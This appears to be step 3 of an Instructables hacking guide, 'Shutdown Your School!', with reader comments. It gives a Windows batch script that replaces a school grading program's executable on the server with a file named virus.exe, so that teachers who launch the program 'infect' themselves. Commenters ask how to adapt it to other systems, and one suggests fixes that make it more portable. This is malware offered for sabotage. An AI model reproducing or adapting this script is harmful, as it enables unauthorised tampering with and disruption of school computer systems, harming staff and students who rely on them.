3 Simple Ways to
Share What You Make

With Instructables you can share what you make with the world — and tap into an ever-growing community of creative experts.

PhotosPhotos

Share one or more photos of a project, recipe, or whatever you've made, quickly and easily.

Step by StepStep-By-Step

Share your step-by-step photos with text instructions of what you made so others can do it too!

VideoVideo

Share your how-to video. You'll need your embed code from a video site such as YouTube.

Shutdown Your School!

Step 3Set up the replication system

Set up the replication system
Here is the code to set up the replicator (the program that allows the virus to reproduce). This simply gets it ready to infect the teachers. ?,$, and ! means that it varies. It depends on what program you are using. To find out how to fill these blank, get on a computer that has access to the server that stores your grading program. ? is the drive letter. $ is any folders and sub folders that contain the main exe for the grading program. ! is the name of the main exe.

Example O:\sti\ssts2\sti.exe
?=O
$=sti\ssts2
!=sti

Here is the code:

@echo off
cd C:\
move ?:\$\!.exe
ren C:?.exe real.exe
ren C:virus.exe !.exe
cd ?:\$
move C:\!.exe
move C:\shutdown.bat
move C:\Update.reg
exit

Save this as global.bat

« Previous StepDownload PDFView All StepsNext Step »
12 comments
May 18, 2008. 9:05 AMelmynase says:
what' s all that STI and SSTS business!! what's it have to do with the virus?
Aug 13, 2007. 9:52 PMbrockcorbett760 says:
Wait So Do You Have Yo Change The $!?
Dec 11, 2007. 8:23 AMreaper666 says:
will this code work on Macs???
Nov 27, 2007. 12:02 PMnkk07 says:
is the code for all computers?
Aug 3, 2007. 2:53 AMdondanielo says:
here you tiped it with the sti programm, on our school, all programms are runned from a server. maybe can you explain me, how it should look like, if i would run it with MS word for example ? so do I just have to change the path, and it will word ?
Jul 2, 2007. 1:48 AMamc6211 says:
Hey my school runs of of a program that is internet based what do i do? It's called Infinite Campus and it runs on java. would this still work?
Mar 14, 2007. 12:33 PMLamaBot says:
If you're writing an instructable to "instruct" others, you might want to consider there schools systems don't use the C:\ label, therefore you might want to use the %SYSTEMDRIVE% environment variable to make sure.
Mar 18, 2007. 5:41 PMLamaBot says:
Savvy instructable btw. Kudos. LamaBot
Mar 18, 2007. 5:40 PMLamaBot says:
Yes, the this is an environment variable. For example, goto DOS or the command prompt and type in: echo %SYSTEMDRIVE% or type in: set This shows you all the enviroment variables.

Pro

Get More Out of Instructables

Already have an Account?

close

All Steps Viewing
View all steps of an Instructable on the same page when you're a Pro Member.

Upgrade to Pro today!
2
Followers
2
Author:mutant
Hello. I'm Matt and I am one of those people who likes to experiment with things. To tamper with their innermost parts, and see what makes them tick. That is why I love hacking. It is the only thing t...
more »